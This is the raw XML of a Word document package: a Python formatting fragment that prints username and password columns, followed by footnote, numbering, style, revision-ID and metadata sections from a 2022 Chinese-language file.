        <w:t xml:space="preserve">'%-12s%-12s' % (un, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7032851D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A423F92" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="00B46445" w:rsidRDefault="00B2088F">
      <w:pPr>
        <w:spacing w:after="730" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B2088F" w:rsidRPr="00B4644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5136" w14:textId="77777777" w:rsidR="00D76CD3" w:rsidRDefault="00D76CD3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B39A03F" w14:textId="77777777" w:rsidR="00D76CD3" w:rsidRDefault="00D7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44A7" w14:textId="001D87BB" w:rsidR="009244CA" w:rsidRDefault="009244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0595" w14:textId="77777777" w:rsidR="00D76CD3" w:rsidRDefault="00D76CD3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="57D6B0B2" w14:textId="77777777" w:rsidR="00D76CD3" w:rsidRDefault="00D7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928DAB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8C928DA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65E7A34"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A65E7A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580A50F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C580A50F"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="14"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="01B642A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01B642A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0804641C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="080464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9F4EE25"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="09F4EE25"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="10"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11477E24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11477E2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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11D4138B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11D4138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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1DECF575"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1DECF575"/>
    <w:lvl w:ilvl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27498171"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="27498171"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2765761D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2765761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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="30B7BDFD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="30B7BD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30CD5485"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30CD5485"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5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46A62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31246A6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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42033330"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4203333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 w16cid:durableId="2130004168">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1914045160">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1905144948">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1242443462">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1741097217">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1906069342">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="283116677">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1738283410">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1270963798">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="805044775">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1718161807">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1188714122">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="207382429">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1712417427">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="804393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5NzcxODM2M2QzMTNkYzJhZDhlNWNhODVjMGMxNTcifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="1048716D"/>
    <w:rsid w:val="000131EC"/>
    <w:rsid w:val="00013A1B"/>
    <w:rsid w:val="00017FAE"/>
    <w:rsid w:val="00034A7E"/>
    <w:rsid w:val="00044C1B"/>
    <w:rsid w:val="0008280E"/>
    <w:rsid w:val="000873C5"/>
    <w:rsid w:val="000A138B"/>
    <w:rsid w:val="000A56B9"/>
    <w:rsid w:val="000F256A"/>
    <w:rsid w:val="00192D11"/>
    <w:rsid w:val="00217985"/>
    <w:rsid w:val="002240BA"/>
    <w:rsid w:val="002309DA"/>
    <w:rsid w:val="00281CE7"/>
    <w:rsid w:val="002A3325"/>
    <w:rsid w:val="002C5AF0"/>
    <w:rsid w:val="002D61F0"/>
    <w:rsid w:val="003231C9"/>
    <w:rsid w:val="0032439A"/>
    <w:rsid w:val="00334507"/>
    <w:rsid w:val="00353042"/>
    <w:rsid w:val="0035427E"/>
    <w:rsid w:val="0035753C"/>
    <w:rsid w:val="003619E8"/>
    <w:rsid w:val="00374C91"/>
    <w:rsid w:val="0038289C"/>
    <w:rsid w:val="0038605D"/>
    <w:rsid w:val="003A74EC"/>
    <w:rsid w:val="003B5FDF"/>
    <w:rsid w:val="003D68E4"/>
    <w:rsid w:val="003E015B"/>
    <w:rsid w:val="003E1C57"/>
    <w:rsid w:val="0041388C"/>
    <w:rsid w:val="00421F02"/>
    <w:rsid w:val="00442EAA"/>
    <w:rsid w:val="004578DD"/>
    <w:rsid w:val="004874ED"/>
    <w:rsid w:val="004B665A"/>
    <w:rsid w:val="0052509B"/>
    <w:rsid w:val="005807BE"/>
    <w:rsid w:val="005A176F"/>
    <w:rsid w:val="005A3781"/>
    <w:rsid w:val="005F23D4"/>
    <w:rsid w:val="005F6234"/>
    <w:rsid w:val="00656C91"/>
    <w:rsid w:val="00671285"/>
    <w:rsid w:val="006724AD"/>
    <w:rsid w:val="006C4BD9"/>
    <w:rsid w:val="006E70D0"/>
    <w:rsid w:val="00707AEB"/>
    <w:rsid w:val="00735DAB"/>
    <w:rsid w:val="00762C33"/>
    <w:rsid w:val="0078266C"/>
    <w:rsid w:val="0079685C"/>
    <w:rsid w:val="007A1781"/>
    <w:rsid w:val="007E3734"/>
    <w:rsid w:val="007F066F"/>
    <w:rsid w:val="0080374F"/>
    <w:rsid w:val="008532DE"/>
    <w:rsid w:val="008752FC"/>
    <w:rsid w:val="008B4F3B"/>
    <w:rsid w:val="00904F55"/>
    <w:rsid w:val="009174EC"/>
    <w:rsid w:val="009244CA"/>
    <w:rsid w:val="00941CE0"/>
    <w:rsid w:val="009D2290"/>
    <w:rsid w:val="009E0085"/>
    <w:rsid w:val="00A17B8C"/>
    <w:rsid w:val="00A347A3"/>
    <w:rsid w:val="00A377EE"/>
    <w:rsid w:val="00A5417C"/>
    <w:rsid w:val="00A632BE"/>
    <w:rsid w:val="00A82D1B"/>
    <w:rsid w:val="00A9611E"/>
    <w:rsid w:val="00AD1D5F"/>
    <w:rsid w:val="00B03C56"/>
    <w:rsid w:val="00B12940"/>
    <w:rsid w:val="00B2088F"/>
    <w:rsid w:val="00B46445"/>
    <w:rsid w:val="00B6409B"/>
    <w:rsid w:val="00B8705A"/>
    <w:rsid w:val="00BA7D89"/>
    <w:rsid w:val="00BC7BA7"/>
    <w:rsid w:val="00BD35A3"/>
    <w:rsid w:val="00C06E0A"/>
    <w:rsid w:val="00C3185E"/>
    <w:rsid w:val="00C33979"/>
    <w:rsid w:val="00C34BF2"/>
    <w:rsid w:val="00C47DA2"/>
    <w:rsid w:val="00C516B9"/>
    <w:rsid w:val="00C85BCD"/>
    <w:rsid w:val="00CB0EF5"/>
    <w:rsid w:val="00CD38DC"/>
    <w:rsid w:val="00CD53ED"/>
    <w:rsid w:val="00D16B8C"/>
    <w:rsid w:val="00D23248"/>
    <w:rsid w:val="00D426CC"/>
    <w:rsid w:val="00D76CD3"/>
    <w:rsid w:val="00DA0809"/>
    <w:rsid w:val="00DA5CB9"/>
    <w:rsid w:val="00E13956"/>
    <w:rsid w:val="00E22595"/>
    <w:rsid w:val="00E43C20"/>
    <w:rsid w:val="00E54DE0"/>
    <w:rsid w:val="00E84332"/>
    <w:rsid w:val="00E858E8"/>
    <w:rsid w:val="00EB1B9F"/>
    <w:rsid w:val="00EB44D1"/>
    <w:rsid w:val="00F00E45"/>
    <w:rsid w:val="00F066D8"/>
    <w:rsid w:val="00F06E93"/>
    <w:rsid w:val="00F07598"/>
    <w:rsid w:val="00F22C9D"/>
    <w:rsid w:val="00F356F1"/>
    <w:rsid w:val="00F374C4"/>
    <w:rsid w:val="00F71B28"/>
    <w:rsid w:val="00F92466"/>
    <w:rsid w:val="00F9363B"/>
    <w:rsid w:val="0C9C7229"/>
    <w:rsid w:val="0D3C3A17"/>
    <w:rsid w:val="1048716D"/>
    <w:rsid w:val="10966DF4"/>
    <w:rsid w:val="109B0DF4"/>
    <w:rsid w:val="11755C50"/>
    <w:rsid w:val="14F43309"/>
    <w:rsid w:val="1AC45552"/>
    <w:rsid w:val="1DEA37FA"/>
    <w:rsid w:val="1FC465CE"/>
    <w:rsid w:val="20F811C8"/>
    <w:rsid w:val="224F4C7E"/>
    <w:rsid w:val="225D2089"/>
    <w:rsid w:val="24C83E91"/>
    <w:rsid w:val="29104BB3"/>
    <w:rsid w:val="30322561"/>
    <w:rsid w:val="31C81974"/>
    <w:rsid w:val="37D07C48"/>
    <w:rsid w:val="3BCE4C8E"/>
    <w:rsid w:val="40752FE6"/>
    <w:rsid w:val="428119F2"/>
    <w:rsid w:val="42F7270F"/>
    <w:rsid w:val="48B8194D"/>
    <w:rsid w:val="49414E08"/>
    <w:rsid w:val="4B262DD2"/>
    <w:rsid w:val="4CF46381"/>
    <w:rsid w:val="52262073"/>
    <w:rsid w:val="52FC2DD4"/>
    <w:rsid w:val="53492B05"/>
    <w:rsid w:val="563D3E2F"/>
    <w:rsid w:val="572D076A"/>
    <w:rsid w:val="669E4EAC"/>
    <w:rsid w:val="71AB17F5"/>
    <w:rsid w:val="764F7CA2"/>
    <w:rsid w:val="775D5EC6"/>
    <w:rsid w:val="78263802"/>
    <w:rsid w:val="7DBC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E0FE2"/>
  <w15:docId w15:val="{D5C71150-BA47-4ECE-9F5B-FDAE9031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uiPriority="9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8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17" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24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annotation subject"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="ae"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink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ljs-string">
    <w:name w:val="hljs-string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12">
    <w:name w:val="页脚1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a6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13">
    <w:name w:val="页脚 字符1"/>
    <w:basedOn w:val="a0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  <w:snapToGrid w:val="0"/>
      <w:color w:val="000000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标题 4 字符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5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5"/>
    <w:link w:val="ad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c">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab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088F"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B2088F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22BBC7-81B1-4D18-AAD4-2F9B06E7B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0</Pages>
  <Words>14480</Words>
  <Characters>82540</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>687</Lines>
  <Paragraphs>193</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>9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云竹</dc:creator>
  <cp:lastModifiedBy>秦 以</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-01T02:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06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884781710574F018E7ED67DEF6DEF0A</vt:lpwstr>
  </property>
</Properties>
</file>